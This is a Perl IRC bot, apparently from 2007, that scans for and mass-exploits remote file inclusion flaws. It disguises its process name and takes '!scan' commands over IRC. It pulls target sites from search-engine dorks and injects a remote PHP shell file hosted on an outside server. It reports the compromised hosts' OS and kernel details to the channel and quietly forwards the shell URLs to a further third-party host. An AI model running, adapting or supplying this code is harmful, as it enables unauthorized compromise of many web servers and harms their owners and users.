################################################################################
#################################################################
#!/usr/bin/perl
# 
# RFi Scanner 2007 by Morgan.. 
#
# <@Morgan> !scan page.php?id= "Powered by RGameScript"
# <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google 
# <NewScan_Google> [Scan] Google Found: 1656 Sites!
# <NewScan_Google> [Scan] Cleaned results: 36 Sites!
# <NewScan_Google> [Scan] Exploting started! 
# <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...? 
# <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686 
# <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...? 
# <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 
# <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript"
#
#
# Enjoy!
# /Morgan
#
# irc.realworm.net - #Morgan
################################################################################
#################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="[PHP-SHELL]"; # Aqui vc Coloca a CMD
my $server="irc.realworm.net"; # Aqui vc coloca o Server 
my $porta="6667"; # Aqui a Porta 
my $nick="AllInOne";  # Nick que vai entrar no canal
my $chan="#Morgan"; # Canal Para o scan 
###############END OF CONFIGURATION############

my $verbot = "2.0";
my $cmd="http://usuarios.arnet.com.ar/larry123/safe.txt"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 *  : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :1,0[7S1,0can-Bot] Scan is 3ON1 : 12!scan <bug> <dork>\r\n";

while($line = <$sk>){

$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}

if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}

if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Started: $bug - Dork: $dork Engine: Google ");
stampa($sk, "PRIVMSG $chan :1,0[7G1,0oogle] Scanning now...");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :1,0[7M1,0sn] Scanning now...");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ltavista] Scanning now...");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $chan :1,0[7L1,0ibero] Scanning now...");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0lltheweb] Scanning now...");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0sk] Scanning now...");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $chan :1,0[7U1,0ol] Scanning now...");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ol] Scanning now...");
my @aollist=&aol($dork);
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Total results: ".scalar(@tot)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Cleaned results: ".scalar(@puliti)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Scan Finished $dork");
stampa($sk, "PRIVMSG $chan :1,0[7D1,0onate-US] Donate to make this scanner better.. Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe4OFF1] 1,0[7S1ys4 ".$type."1] 1,0[7F1ree4 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]4 $ker  ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe3ON1] 1,0[7S1ys3 ".$type."1] 1,0[7F1ree3 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]3 $ker  ");
checksafemode("$print");}}
}}}
exit;
}}}


sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}

sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Kernel:(.+?)\<br>/g){
$ker=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}

sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){
my $k=$1;
$k=~s/<b>//g;
$k=~s/<\/b>//g;
$k=~s/<wbr>//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/<span class=ngrn>(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}


sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}

sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}


sub checksafemode($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
}


sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}